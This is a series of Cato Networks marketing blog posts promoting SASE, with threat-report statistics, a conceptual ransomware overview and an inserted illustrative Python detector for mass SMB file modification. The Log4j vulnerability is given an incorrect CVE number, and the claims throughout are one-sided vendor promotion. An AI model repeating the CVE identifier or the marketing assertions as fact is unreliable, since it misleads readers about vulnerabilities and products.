The Cato SASE Cloud offers better overall network resiliency than MPLS and SD-WAN, and it accomplishes this at a fraction of the price of MPLS.
Improve Company Productivity and Security with Cato
Corporate networks are rapidly expanding and becoming more dynamic. As more companies allow hybrid working options, they need to ensure that these employees have a reliable, secure, high-performance network experience no matter where they are connecting from.
The Cato SASE Cloud is a converged, cloud-native, global connected architecture that provides high-performance network connectivity with built-in multi-layer redundancy for all users, devices, and applications. This protects organizations against crippling network outages and ensures predictable network availability with a 99.999% SLA.
Building a highly resilient and redundant corporate network helps to improve company productivity and security. Learn more about SASE and about enhancing your organization’s network resiliency by requesting a free demo of the Cato SASE Cloud today.
Integrated vs. Converged SASE: Which One Ensures an Optimal Security Posture?
SASE (Secure Access Service Edge) is a new architecture that converges networking and security into cloud-native, globally available service offerings. Security inspection and policy enforcement are performed at the cloud edge, instead of backhauling all traffic to a centralized data center for inspection. This enables organizations to strengthen their security posture while ensuring high performance, scalability and a good user experience.
Unfortunately, many vendors attempt to market loosely integrated products and partnerships as SASE. They find the fastest way to enter the SASE market is to virtualize existing hardware-based products, deploy them into public cloud providers (AWS, Azure, GCP), and then enhance them with additional capabilities.
So, which approach is best? In this blog post we explore the two options, converged and integrated, and the differences between them. To learn more about which SASE vendor you should choose you can read the whitepaper this blog post is based on: “Integrated vs. Converged SASE: Why it Matters When Ensuring an Optimal Security Posture”.
Why Do Some SASE Vendors Offer an Integrated SASE Solution?
Integrating siloed point solutions is the fast track to entering the SASE market. But this type of solution is full of drawbacks. These include:
Increased Complexity - Integrated solutions add management layers, which reduces agility. Integration does not deliver the required SASE capabilities and requires more effort and risk from the customer. This is the opposite of what Gartner envisioned SASE to be.
Poor Performance - SASE solutions that rely on integration can’t provide a single-pass architecture. Single Pass is critical for SASE’s promise of high performance because all engines simultaneously process traffic flows and apply policies to them at the cloud edge. Integrated solutions do not have this single-pass architecture, so they are vulnerable to higher latency issues.
Limited Vendor Control - Some vendors with an incomplete SASE solution will partner with other technology vendors to build their offerings. This means each vendor only controls and supports their product, and customers subsequently are left with multiple security technologies to deploy and manage. Because of the numerous risks this creates, including security blind spots, customers will not enjoy the full promise of SASE.
Security Gaps - Technology integration increases the chance of security events being ignored or overlooked. Because each product in an integrated architecture is configured to inspect certain activities within traffic flows, each views the traffic in its own context. This leads to insufficient sharing of all necessary context, thus leaving networks exposed to security gaps.
Lack of Full Visibility - Integrated offerings tend to rely on multiple consoles and sources that prevent accurate correlation of network and security traffic flows and events. Because of this, customers do not have full visibility and context of these flows and will not have the same level of control that a converged SASE solution has.
What are the Benefits of Converged SASE?
Converged SASE is built from the ground up to deliver both security and networking capabilities. This benefits the customer in the following areas:
Rapid Deployment - Integrated solutions have longer deployments since they have multiple consoles and multiple policies that require extensive manual effort from the customer, which risks policy mismatches or other errors during the deployment. A converged architecture, on the other hand, simplifies deployments with a single management application for configuration and a single policy for all customer sites. This makes the deployment less complex, allowing quick and easy implementation.
Decreased Overhead - Converged SASE provides a single management application for management and reporting that decreases administrative overhead and simplifies investigation and troubleshooting.
Low Latency - A true single-pass architecture decreases latency by ensuring all security engines simultaneously inspect and apply policies on all traffic once at the cloud edge before forwarding it on to its destination.
Cloud-Native Possibilities - Solutions that are born in the cloud are purpose-built for scalability, agility, flexibility, resilience and global performance. This is unlike cloud-delivered solutions that are virtual machines based on appliance-based products that are deployed in public cloud provider data centers.
No Hybrid or On-Premises Deployments - SASE was defined by Gartner as being delivered from a cloud-native platform. Vendors that offer hybrid or on-premises options are not cloud-native and customers should proceed with caution and remember the core requirements of SASE when considering those options.
Integrated vs. Converged SASE
Which type of solution is best for modern enterprises? Here are the main functionalities offered by each type of solution:
Integrated SASE:
SD-WAN from partners
Multiple management consoles
Require VM deployment
Require tunnel configuration
Hosted in the public cloud
Separate authentication flows for security and access
Require SIEM for network and security event correlation
Networking, security and remote access products are separate
Requires multiple products
Different PoPs offer different capabilities
Converged SASE:
A single management application
Full mesh connectivity
Optional use of IPSEC tunnels
Optional export to SIEM
Better collaboration among converged technologies
Holistic security protections
All PoPs are fully capable
There is consistent policy enforcement
Which Vendor Should You Choose?
There are fundamental differences in SASE capabilities between an integrated and a converged platform. These include their ability to eliminate MPLS, simplify and optimize remote access, enable easy cloud migration, and secure branch and mobile users. SASE solutions are designed to address numerous customer use cases and solve multiple problems, and it is important for customers to conduct a thorough evaluation of both approaches to ensure their chosen platform meets their current and future business and technology needs.
Read more about how to choose a SASE vendor from the whitepaper.
Cato Analyzes the Dominant Sources of Threats in 2H2022 Research Report
We recently issued the Cato Networks SASE Threat Research Report, which highlights cyber threats and trends based on more than 1.3 trillion flows that passed through the Cato SASE Cloud network during the second half of 2022. The report highlights the most popular vulnerabilities that threat actors attempted to exploit, and the growing use of consumer applications that may present a risk to the enterprise.
Cato Scans a Vast Trove of Data to Hunt for Threats
One of the first observations in the report was the sheer scale of our data repository. Cato’s convergence of networking and security provides unique visibility on a global scale into both legitimate enterprise network usage and the malicious activity aimed at enterprise networks. This includes hostile network scans, exploitation attempts, and malware communication to C&C servers.
Like many security vendors, we collect information from threat intelligence feeds and other security resources. But as a networking provider, we’re also able to enrich our understanding of security events with network flow data often unavailable to security professionals. During 2022, Cato’s data repository was fed by more than 2.1 trillion network flows traversing our global private backbone, or about 20% growth in flows each quarter.
Security events, threats, and incidents also grew in proportion to the number of network flows. In the second half of 2022, the Cato Threat Hunting System (CTHS) detected 87 billion security events across the entire Cato Cloud. A security event is any network flow that triggers one of Cato’s many security controls.
CTHS is a natural extension of Cato Cloud security services. It is comprised of a set of algorithms and procedures developed by Cato Research Labs that dramatically reduces the time to detect threats across enterprise networks. CTHS is not only incredibly accurate but also requires no additional infrastructure on a customer’s network.
CTHS concluded there were 600,000 threats, or high-risk flows, based on machine learning and data correlation. Of these, 71,000 were actual incidents, or verified security threats.
Cato Identifies the Top Threats and Exploit Attempts on the Network
Over the years, Cato has been tracking the top threats on the network and the trends haven’t changed much. The top five threat types in the current research report are (1) Network Scan, at 31.2 billion events, (2) Reputation, at 4.7 billion events, (3) Policy Violation, at 1.3 billion events, (4) Web Application Attack, at 623 million events, and (5) Vulnerability Scan, with 482 million events.
Other types of threats worth noting include Remote Code Execution (92 million), Crypto Mining (56 million), and Malware (55 million). Remote Code Execution events and Malware events both increased over the previous reporting period, but Crypto Mining events decreased. This latter fact may be due to the recent decline in the cryptocurrency business itself following the collapse of the FTX exchange.
The most-used cloud apps in the reporting period were from Microsoft, Google, Apple, Amazon (AWS), and Meta (Facebook). Many consumer-oriented applications were also in use, including YouTube, TikTok, Spotify, Tor, Mega, and BitTorrent. The latter three apps are known to be used frequently for malicious activities and pose a potential risk to enterprise networks.
The Log4j vulnerability (CVE-2022-44228) is a relatively recent discovery that is estimated to have affected nearly a third of all web servers in the world. Thus, it’s no surprise that it continues to dominate exploitation attempts with 65 million events across the Cato Cloud network. What is surprising is that two older vulnerabilities continue to make the top five list for exploit attempts. One is CVE-2017-9841, a remote code execution bug from 2017, and the other is CVE-2009-2445, a 14-year-old vulnerability affecting certain popular web servers.
Cato also tracks network flows associated with MITRE ATT&CK techniques. Network-based scanning and remote system discovery lead the list with 22.6 billion flows and 17 billion flows, respectively. The top five most-used techniques targeting enterprises are Phishing, Phishing for Information, Scanning, Remote System Discovery, and Exploit Public-facing Application. Knowing which attack techniques are most often seen on the network can help organizations tighten their defenses where it is most needed.
For more detailed information, read the Cato Networks SASE Threat Research Report for the second half of 2022.
Unsolved Remote Access Challenges Continue to Propel SASE in 2023, Finds New Cato Survey
By all accounts, 2023 is expected to see strong growth in the SASE market. Gartner has already predicted in The Top 5 Trends in Enterprise Networking and Why They Matter: A Gartner Trend Insight Report (subscription required) that by 2025, 50% of SD-WAN purchases will be part of a single vendor SASE offering, up from less than 10% in 2021. And in a recent audience poll at Gartner’s I&O Cloud conference, when audience members were asked which of five technologies they were most likely to invest in, 31% indicated SASE, making it number two overall, just behind Universal ZTNA (at 34%).
And Gartner isn’t the only one expecting SASE to perform well this year. Dell’Oro expects the SASE market to reach $8 billion in 2023. The drivers for this activity? The need for security everywhere particularly driven by hybrid work. “The internet is now a logical extension of the corporate network, and the need for security is as great as ever,” Dell’Oro Research Director Mauricio Sanchez told SDxCentral.
We couldn’t agree more. We just finished surveying more than 1661 IT leaders about 2023 drivers for SASE adoption. The survey gathered insight into their experiences with SASE and, for those who have not yet deployed SASE, the IT challenges confronting them moving forward.
What’s so striking when you look at the data is the role remote access plays. More than half (51%) of respondents who have not yet adopted any kind of SASE point to enabling remote access from anywhere as their number one challenge. The same is true for “Adopt zero trust security posture for all access.”
Why Remote Access VPNs Are Not the Answer for Hybrid Work
There are any number of reasons why enterprises are looking at replacing legacy remote access solutions. “Traditional approaches anchored only to on-premises solutions at the corporate internet gateway no longer work in the new ‘anywhere, anytime, with any device’ environment that the pandemic accelerated,” SDxCentral quoted Sanchez.
More specifically, legacy VPNs suffer from five key problems:
Scaling and capacity issues. VPN servers have a limited amount of capacity; as more users connect, performance degrades and the user experience suffers. To increase VPN server capacity, IT must deploy new appliances or upgrade existing ones. Security and performance optimization challenges require additional appliances to be purchased, deployed, and integrated, which only increases network complexity.
Lack of granular security controls. Generally, point solutions restrict access at the network-level. Once a user authenticates, they have network access to everything on the same subnet. This lack of granular security and visibility creates a significant risk and leaves gaps in network visibility.
Poor performance. All too often, remote users complain about the sluggishness of corporate applications when accessed remotely. Part of that is an architecture issue, particularly when traffic needs to be brought back to an inspection point, adding latency to the session. VPN traffic is also susceptible to the unpredictability and latency of Internet routing.
Rotten user experience. Remote users struggle with connecting using legacy VPN software. Too many parameters have to be configured to connect properly. Where once this might have been tolerated by a small subset of remote users, it becomes a very different story when the entire workforce operates remotely.
Growing security risk. VPN infrastructure itself has all too frequently been the target of attack. A brief search in the MITRE CVE database for “VPN Server” shows 622 CVE records. VPN servers showed so many security vulnerabilities that CERT warned that many VPN devices were storing session cookies improperly.
It shouldn’t be surprising to learn, then, that when we asked IT leaders further down the SASE adoption curve what triggered their SASE transformation project, “remote access VPN refresh” was the most common response (46%).
SASE: The Answer to the Hybrid Work Challenge
SASE answers those challenges by enabling work to occur anywhere, securely and efficiently. As part of a SASE platform, remote access benefits from the scaling of a cloud-native architecture. There’s no need to add server resources to accommodate users who suddenly need remote access. “Deployment was quick. In a matter of 30 minutes, we configured the Cato mobile solution with single-sign-on (SSO) based on our Azure AD,” says Edo Nakdimon, senior IT manager at Geosyntec Consultants, who had more than 1200 users configured for remote access in less than an hour with the Cato SASE Cloud.
Zero-trust is just part of the SSE pillar of a single-vendor SASE platform, giving IT granular control over remote user resource access. Security is improved by eliminating the VPN servers that are so frequently an object of attack. And remote user performance improves by inspecting traffic in the PoP right near the user’s location and then sending traffic out to other locations across the SASE platform’s global optimized backbone, not the unpredictable Internet.
No wonder those IT leaders who did adopt SASE indicated they were able to address the remote access challenge. When asked, “As a SASE user what are the key benefits you got from SASE?” “Enable Remote Access from Anywhere” was the highest ranked benefit (57% of respondents), followed by “Adopt zero trust security posture for all access” at 47% of respondents.
All of which makes remote access a “quick win” for anyone looking to deploy SASE.
SASE in Manufacturing: Overcoming Security and Connectivity Challenges
Industry 4.0 is revolutionizing the manufacturing industry as we are witnessing numerous innovative technologies such as AI, IoT, and Robotic Process Automation (RPA) helping manufacturers enhance their supply chain, logistics and production lines. While we see these operations evolving into smart factories, the industry still faces challenges that could adversely impact its ability to realize the full potential of Industry 4.0.
Manufacturing Digital Transformation Challenges
Digital Transformation introduces a number of challenges to the manufacturing industry. These include:
Cybersecurity vulnerabilities - The manufacturing industry is especially vulnerable to cyberattacks. Legacy manufacturing systems were not designed to defend against modern-day cyber attacks. Their legacy architecture makes it difficult to remain current on software patches and fixes, and this exposes them to increased risk of security breaches. Additionally, lacking proper visibility and control of all traffic flows makes it virtually impossible to have a rapid response and remediation of threats to the environment.
Lack of flexible, scalable and reliable architectures - Manufacturers require a flexible, scalable and reliable architecture that can easily and cost-effectively scale as the business grows. This is something that MPLS does not provide because it cannot support the cloud evolution that the manufacturing industry is experiencing. Additionally, global expansion is a major challenge due to the cost and complexity of turning up new sites, especially in locations where MPLS is not easy for carriers to offer and support. And while some may deploy SD-WAN to overcome this, it is not suitable for global use cases, something the industry demands.
Cloud Performance - MPLS makes connecting directly to 3rd party SaaS applications impossible for 2 key reasons: MPLS is a point-to-point technology, whereas SaaS traffic flows between cloud providers, so it is not feasible for cloud use; and, SaaS apps like Microsoft 365, FactoryTalk, SAP and others, require high-performance internet access, and this is something MPLS does not provide.
Complicated tool management - Maintaining and monitoring multiple MPLS connections, telecom vendors, and legacy tools is extremely complicated, frustrating and prone to errors. This becomes even more challenging when integrating technology from acquisitions.
Global disconnect - Most manufacturers have global operations, with their HQ, production, engineering, suppliers and sales dispersed across the globe. All these users need secure, high-performance local, remote and global access to enable the business to run, which is hard to deliver over MPLS.
The Solution to Manufacturing Challenges: SASE
SASE (Secure Access Service Edge) is an innovative approach to networking and security that converges these technologies into a single, global, cloud-native service that enables enhanced security, consistent policy enforcement, and faster threat response times. With SASE, manufacturers can overcome the above-mentioned challenges that plague many factories during their digital transformation journey.
To support this journey, manufacturers need a new solution: SASE. With SASE, enterprise networking and security technologies are converged into a single cloud-native software stack and delivered over a global backbone where all capabilities operate in unison. SASE allows manufacturers to reduce the risk of cybersecurity breaches while delivering reliable, low latency, global access to applications and systems. The following capabilities are crucial for SASE to deliver on its promise:
A Single Network Architecture
SASE, having its own global backbone, enables authorized users, locations, clouds and applications to reliably and consistently connect at any time and from anywhere in the world.
The SASE cloud enables IT teams to instantly scale, optimize and enhance the network according to business requirements, and this ensures reliable and predictable performance for applications and a rich experience for all users.
Cloud Data Architecture
SASE optimizes traffic and routes it along the best path to its destination based on WAN optimization and dynamic routing policies. This ensures low latency cloud access for all users.
SASE strengthens the security posture by providing all required security capabilities including Zero Trust Network Access (ZTNA), firewall-as-a-service (FWaaS), cloud-access security broker (CASB), DLP and secure web gateway (SWG).
ZTNA in SASE ensures only authenticated and authorized users and devices gain access to critical enterprise business applications. To further extend security protection and coverage, Managed Detection and Response (MDR) is also available.
Consistent Access for Mobile Users and Suppliers
All authorized users receive consistent access, performance, and security no matter where they are.
What’s Next for Manufacturers?
SASE allows manufacturers to focus their time and resources on key business initiatives such as global expansion and enhancing factory operations instead of worrying about IT and security. This allows them to do what they do best, while maintaining peace of mind that their network and security needs are covered.
To learn more about SASE and manufacturing, listen to the podcast episode “How to implement SASE in manufacturing: A discussion with PlayPower”.
February 20, 2023
Security Convergence in the Cloud: Protect More, Worry Less
Many organizations struggle with an array of security point products that create security gaps, alert overload, and inconsistent policy configuration and enforcement challenges. As a result, many companies realize the benefit of moving toward an enhanced security platform that combines multiple security technologies into a single solution.
There are two approaches to achieve this:
Integration: The security platform is built by connecting together several existing solutions to achieve the desired functionality.
Convergence: The security platform is built from the ground up, with a single software stack that natively integrates all of the desired security functionality.
Convergence and integration can both be used to build a security platform. However, the two approaches work very differently and produce different results.
Where Security Integration Falls Short
Integration is a common approach to building security platforms because a vendor may already have the required pieces in its product suite. By cobbling them together into a single offering, they build something that appears to solve the problems that companies face.
However, security platforms developed via integration have several common flaws, including:
Policy Mismatches: Individual security tools are designed to solve specific problems. By definition, policy mismatches can exist between these tools in an integrated security platform, so they may not work properly.
Blind Spots: Individual security tools don’t view traffic flow in the same context, so a security incident captured by one tool may not trigger on another tool. Further, these tools do not effectively share a similar context of traffic flow. This causes coverage blind spots which leave organizations exposed and at risk for cyber attacks.
Decreased Efficiency: Integrated security tools are built of solutions with a defined set of features. Cobbling multiple tools together may create inefficiencies where multiple tools perform the same function.
False Alarms: Context is essential to differentiate between true threats and false positives. An array of tools that all look at threats independently and then share information may generate false positives that a holistic platform would not.
Interoperability Challenges: Existing tools have different code bases and policy constructs that may create challenges when trying to integrate multiple tools. These challenges can impact security coverage, security enforcement consistency, and architecture scalability, just to name a few.
Integration can build an all-in-one security solution. However, these platforms are much more likely to have significant issues that won’t exist in a converged solution.
Cloud-Native Convergence is the Key to Improved Security
Cloud migration has a significant impact on corporate IT architecture and security. Cloud adoption increases the distribution and scalability of IT infrastructure and makes IT environments more complex. As a result, it is more difficult to secure these environments, especially when users are distributed as well. So, security convergence is essential for security teams to keep pace with their responsibilities.
As corporate IT architecture expands to the cloud, an on-prem, perimeter-focused security architecture no longer makes sense. Optimizing network performance without compromising security requires moving security to where users and IT assets are: the cloud. Corporate systems hosted in the cloud take advantage of cloud scalability, which also places strain on their security infrastructure. As a result, corporate security must be not only cloud-delivered but cloud-native. This allows security to scale with the growth of the business.
Corporate environments are changing rapidly, and these changes make security more complex. Converged, cloud-native solutions are the key to improving the security of all aspects of an organization’s IT architecture.
Security Convergence with Cato SSE 360
Cato has long been committed to improving security through cloud-native convergence. Cato’s SASE Cloud and SSE 360 are cloud-native solutions that offer a range of converged security functions, including Cloud Access Security Broker (CASB), Cloud Secure Web Gateway (SWG), Firewall-as-a-Service (FWaaS), Intrusion Prevention Systems (IPS), and Zero-Trust Network Access (ZTNA).
Cato SSE 360’s converged security offers a range of benefits for organizations, including:
Improved Security Collaboration: As a converged security solution, Cato SSE 360’s security functions were designed to operate collectively. This means better collaboration between security technologies, which leads to tighter security coverage and improved outcomes.
Context Sharing: Different security technologies offer different insights for threat detection and classification. A converged security solution like Cato SSE 360 can share context more effectively because each technology has the same context, captured from the same traffic flow. This dramatically improves threat detection and response.
Faster Threat Response: Security convergence improves the quality of security data and enables SOC analysts to investigate and respond to incidents from a single solution. As a result, they can more quickly identify and remediate potential threats.
Reduced Blind Spots: Cato SSE 360 was designed as a single, converged security software stack from the beginning. This dramatically reduces blind spots when compared to solutions built from several integrated, standalone products.
More Efficient Operations: A converged security solution is more efficient because it eliminates redundant technologies. Additionally, it makes security operations centers (SOCs) more efficient by providing fewer, higher-quality alerts and enabling SOC analysts to more efficiently analyze and respond to potential threats.
360-Degree Security Coverage: Cato SSE 360 offers 360-degree security visibility and coverage.
Configurable Security: As a Security-as-a-Service (SECaaS) solution, Cato SSE 360 provides the right amount of security when an organization needs it. Cloud scalability enables rapid expansion to address increases in capacity requirements as the company grows.
Defending the Modern Enterprise with Cato SSE 360
Cato SSE 360 protects the modern enterprise from cyber threats by offering the most comprehensive network security solution in a converged, cloud-native architecture. To learn more about how Cato SSE 360 can help improve your organization’s security, sign up for a free demo today.
February 16, 2023
A SASE Approach to Enterprise Ransomware Protection
Ransomware continues to be a prime cyber threat to organizations of all sizes. One thesis for this is that these attacks are easier and less expensive to execute than ever before, while offering very high rates of return for cybercriminals. Since the 2017 WannaCry epidemic, the ransomware industry has evolved through several stages, including:
Large-Scale Campaigns: Ransomware attacks like WannaCry were designed to infect as many systems as possible. Each infection would demand a relatively small ransom, trying to make a profit via quantity over quality.
Targeted Attacks: Over time, ransomware campaigns have evolved to be extremely targeted attacks against particular organizations. In-depth research allows cybercriminals to identify how to maximize their profits for each infection.
Ransomware as a Service (RaaS): RaaS gangs distribute copies of their malware to affiliates for a cut of the profits of successful infections. This model increased the number of companies infected with high-quality ransomware.
Double Extortion: Double extortion ransomware both steals and encrypts sensitive and valuable data on an infected system. The threat of a data leak is used to increase the probability of a ransom payment.
Triple Extortion: Triple extortion expanded the impact of a ransomware attack from the infected organization to its customers. The ransomware operators demand payments from multiple organizations whose data is affected by the attack.
Ransomware has proven to be a highly effective and profitable cyber threat. Cybercriminals will continue to innovate and build on their success to improve attack profitability and the probability of ransom payments.
Common Attack Methods for Ransomware Attacks
Cybercriminals use various methods to deploy and execute ransomware, and the following are a small sample of the most common:
Vulnerability Exploits: Unpatched vulnerabilities are a very common method for delivering ransomware. By exploiting these vulnerabilities, cybercriminals can plant and execute the malware on a vulnerable system.
Phishing: Phishing attacks use social engineering to trick users into downloading and executing malware on their devices. The ransomware can be attached to the message or located on a phishing site indicated by a malicious link.
Compromised Credentials: User credentials can be guessed, compromised by phishing, or breached in other ways. Cybercriminals can use these credentials with the remote desktop protocol (RDP) or virtual private networks (VPNs) to access and deploy malware on systems.
Malicious Downloads: Phishing sites may offer ransomware files for download. These files could masquerade as legitimate software or exploit vulnerabilities in the user’s browser to download and execute themselves.
Stages of a Ransomware Attack
Ransomware follows many of the same steps as other types of malware. The main stages in an attack include the following:
Initial Infection: A ransomware attack starts with the malware gaining access to a target system. This can be accomplished via a variety of methods, such as phishing or the use of compromised credentials.
Command and Control: Once the ransomware achieves execution, it establishes a command and control (C2) channel with its operator. This allows the ransomware to send data to and receive instructions from its operator.
Lateral Movement: Ransomware rarely immediately lands on a device containing the high-value data that it plans to encrypt. After gaining a foothold on a corporate network, the malware will perform discovery and move laterally to gain the access and privileges needed to encrypt valuable and sensitive data.
Data Theft and Encryption: Once it gains the required access, the malware will begin encrypting data and deleting backups. It may also exfiltrate copies of the data to its operator via its C2 channel.
Ransom Note: Once data encryption has been completed, the malware will reveal its presence on the system by publishing a ransom note. If the ransom is then paid and the decryption key is provided, the ransomware would decrypt all of the files that were encrypted.
Ransomware Prevention Strategies
Once data theft and encryption have begun, an organization’s ransomware remediation options are limited. However, companies can take steps to reduce the probability of a ransomware infection, including the following:
Vulnerability Management: Regular vulnerability scanning and patching can help to close the security gaps exploited to deliver ransomware. Additionally, Web Application and API Protection (WAAP) solutions can block the attempted exploitation of unpatched vulnerabilities.
Email Security: Another common method of delivering ransomware and other malware is phishing. Email security solutions can identify and block messages containing malicious attachments or links to phishing pages.
Multi-Factor Authentication (MFA): Compromised credentials can be used to access corporate systems and deliver malware via remote access solutions. Deploying strong MFA increases the difficulty of using compromised credentials.
Web Security: Ransomware can be downloaded intentionally or unintentionally from malicious sites. A secure web gateway (SWG) can block browsing to dangerous sites and malicious downloads.
Endpoint Security: Ransomware is malware that runs and encrypts files on an infected endpoint. Endpoint security solutions can identify and remediate ransomware infections.
Cato’s Approach to Enterprise Ransomware Protection
Using machine learning algorithms and the deep network insight of the Cato SASE Cloud, we’re able to detect and prevent the spread of ransomware across networks without having to deploy endpoint agents. Infected machines are identified and immediately isolated for remediation.
Cato has a rich multilayered malware mitigation strategy of disrupting attacks across the MITRE ATT&CK framework. Cato’s antimalware engine prevents the distribution of malware in general. Cato IPS detects anomalous behaviors used throughout the cyber kill chain. Cato also uses IPS and NextGen Anti-Malware to detect and prevent MITRE ATT&CK techniques used by common ransomware groups, which spot the attack before the impact phase. And, as part of this strategy, Cato security researchers follow the techniques used by ransomware groups, updating Cato’s defenses, and protecting enterprises against exploitation of known vulnerabilities in record time.
We use heuristic algorithms specifically designed to detect and interrupt ransomware. The machine-learning heuristic algorithms inspect live SMB traffic flows for a combination of network attributes including:
Blocking the delivery of known malware files.
Detecting command and control traffic and attempts at lateral movement.
Identifying access attempts for remote drives and folders.
Monitoring time intervals, such as encrypting drives in seconds.
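The time-interval and remote-folder attributes in the list above can be illustrated with a sliding-window check over SMB file-operation records. This is an added example, not Cato's code or algorithm; the record fields, thresholds and sample events are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class SmbEvent:
    """Assumed shape of one parsed SMB file operation (hypothetical fields)."""
    ts: float     # seconds since start of capture
    client: str   # source host
    share: str    # remote share, e.g. \\fs01\finance
    path: str     # file path inside the share
    op: str       # "read", "write", "rename" or "delete"


MODIFYING_OPS = {"write", "rename", "delete"}


def detect_mass_modification(events, window_s=10.0, min_files=20, min_dirs=3):
    """Return {client: first_alert_ts} for clients that modify at least
    min_files distinct files spread over at least min_dirs directories
    within window_s seconds. Thresholds are illustrative assumptions."""
    recent = defaultdict(deque)  # client -> (ts, share, path) inside the window
    alerts = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.op not in MODIFYING_OPS or ev.client in alerts:
            continue
        window = recent[ev.client]
        window.append((ev.ts, ev.share, ev.path))
        # Drop operations that have aged out of the window.
        while window and ev.ts - window[0][0] > window_s:
            window.popleft()
        files = {(share, path) for _, share, path in window}
        dirs = {(share, path.rsplit("\\", 1)[0]) for share, path in files}
        if len(files) >= min_files and len(dirs) >= min_dirs:
            alerts[ev.client] = ev.ts
    return alerts


def build_sample_events():
    """Constructed sample traffic: two benign clients and one suspicious one."""
    events = []
    # A user saving a few documents, one per minute.
    for i in range(5):
        events.append(SmbEvent(60.0 * i, "10.0.0.5", r"\\fs01\hr",
                               rf"policies\doc{i}.docx", "write"))
    # A bulk copy of 25 files into a single directory within 5 seconds.
    for i in range(25):
        events.append(SmbEvent(100.0 + 0.2 * i, "10.0.0.7", r"\\fs01\apps",
                               rf"setup\file{i}.bin", "write"))
    # Read-then-rewrite of 30 files across 5 directories within 3 seconds.
    for i in range(30):
        t = 200.0 + 0.1 * i
        path = rf"dept{i % 5}\report{i}.xlsx"
        events.append(SmbEvent(t, "10.0.0.9", r"\\fs01\finance", path, "read"))
        events.append(SmbEvent(t + 0.05, "10.0.0.9", r"\\fs01\finance", path, "write"))
    return events


if __name__ == "__main__":
    for client, ts in detect_mass_modification(build_sample_events()).items():
        print(f"ALERT {client}: mass file modification over SMB at t={ts:.2f}s")
```

Combining the file count with the directory spread keeps the single-directory bulk copy from alerting, which shows why a combination of attributes is used rather than a raw rate threshold.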
Cato Networks provides detection and mitigation of ransomware attacks without deploying agents on endpoints. Learn more about Cato’s network-based ransomware protection.
February 16, 2023
6 Steps to SASE Adoption
SASE adoption requires business and technological planning. By properly preparing for the transition, you will be able to successfully move your business-critical networking and security capabilities to a vendor-delivered service. You will also have the answers to any board and leadership questions.
What does a good SASE adoption plan look like? Below we list six steps that will take you from start to finish. By following them, you can ensure a frictionless transition. (Please note that some of these steps can be executed simultaneously). For more details about each step and how to execute them, read our complete guide, here.
Step 1: Preparation
The first step is to understand what problems you are trying to solve. Do you want to eliminate appliances? Migrate from MPLS to secure SD-WAN? Maybe you need to secure your hybrid cloud or multi-cloud? By determining your drivers you will be able to prioritize functions, allocate the required budget and evaluate vendors and architectures. Once you have your list of use cases, map out which capabilities you need for each one. This will help you identify the right vendor for you, since capabilities vary among them.
Finally, determine your required security coverage. It is recommended to choose a vendor with NGFW, SWG and NextGen anti-malware capabilities. Additional capabilities that will improve your security posture are IPS, DLP, CASB and zero-day/polymorphic threat prevention.
Step 2: Planning and Timeline
Once your use cases and required capabilities are mapped out, you can create a plan for implementing them. Adjust the plan to realistic timelines. Make sure to include considerations like contractual obligations, national holidays, how quickly you wish to deploy and the geographical dispersion of your network.
Step 3: RFI/RFP
Now that the groundwork is set, you can start evaluating vendors. Prepare an RFI or RFP that will help you determine which SASE provider provides the capabilities you need and at the cost you need.
Step 4: Budget and Board Approval
After planning, it’s also time to get leadership approval for the project. Be sure to include a complete business case that maps technical capabilities to drivers and cost savings. You can also add quantifiable metrics that are relevant to your specific business context.
Step 5: PoC
After slimming down your vendor list to one or two recommended ones, you can move forward with a proof of concept. Formulate a clear proof of concept plan in advance, to set clear expectations with vendors. It’s recommended to cap the PoC timeline at thirty days.
Make sure your PoC has the capabilities and the presence that matter to you, including geographical locations, performance and optimization, security coverage and platform cohesiveness.
Step 6: Implementation
You made it! You can now move forward with your front-runner vendor and complete the purchase process. Plan the implementation together with them, since you two are partners now, working together for future success.
Ready to Get Started?
SASE has eliminated the need to perform expensive, time-consuming hardware refreshes, while also ensuring seamless performance, feature enhancements and daily security updates. To learn more about how to get started, review the entire SASE adoption plan, here.
February 14, 2023
Strategic Roadmap to SASE
Introduction
Since Gartner introduced the Secure Access Service Edge (SASE) category in 2019, interest from enterprises has grown substantially. SASE transforms enterprise IT through the convergence of enterprise networking and network security into a single, cloud-native, service. It aims to optimize security posture, enable zero-trust access from anywhere, and reduce costs and complexity. Given its potential impact, SASE is becoming a strategic project for many organizations.
However, the widespread availability of SASE offerings from different vendors and managed services providers is causing a great deal of confusion. Organizations are challenged to compare SASE feature sets and solutions and to combine offerings from multiple vendors, resulting in complex architectures that lead to incomplete service offerings that don’t meet needs and expectations.
Adopting SASE is an IT strategy targeted to accompany and enable rapid growth and digital transformation, not a tactical selection of a point product. As such, making the right selection is more critical than ever.
During the “2022 Strategic Roadmap to SASE” webinar, Gartner Research Vice President Neil Macdonald and Cato Networks CMO Yishay Yovel discussed multiple aspects of SASE but, most importantly, reiterated the fundamental principles and expected benefits that are the basis of why SASE was introduced back in 2019.
Several questions were raised during the webinar; the most interesting and relevant ones are answered below. They cover the following areas:
What business and technical benefits does SASE provide?
When and how should you initiate your SASE project?
How can you deploy SASE gradually into your existing infrastructure?
How do different SASE architectures impact the expected business outcomes?
We hope these Q&A will be able to clear up some of the confusion around SASE and SSE and help organizations make the right decisions when selecting a SASE provider.
SASE market overview
1. Will SSE be replacing SASE in the short term?
No, SSE is just a stop in the journey to SASE. Today, some organizations are not yet ready to fully transition to SASE for various reasons, but they are ready to adopt SSE because they recognize the benefits of adopting cloud-delivered security services such as SWG, CASB, and ZTNA to protect their offices and remote users when accessing the public Internet. The final step in the journey will be to combine the SSE capabilities with cloud-delivered connectivity and control services such as SD-WAN and FWaaS to complement Internet security and provide the best performance and protection when accessing corporate assets.
2. Why is the security industry generally so fragmented, and will it consolidate or splinter more in the next 5 years?
The trend is clearly towards vendor consolidation. Organizations of all sizes are looking to simplify their infrastructure and operations to become more agile. They are favoring vendors that can combine multiple security and networking functionalities in a single platform, rather than best-of-breed solutions. This is confirmed by a recent Gartner survey showing that 75% of organizations are pursuing security vendor consolidation, rising to 90% by year-end 2022. That’s a stunning increase compared to just 29% back in 2020.
3. What are the upcoming changes in SASE that experts foresee?
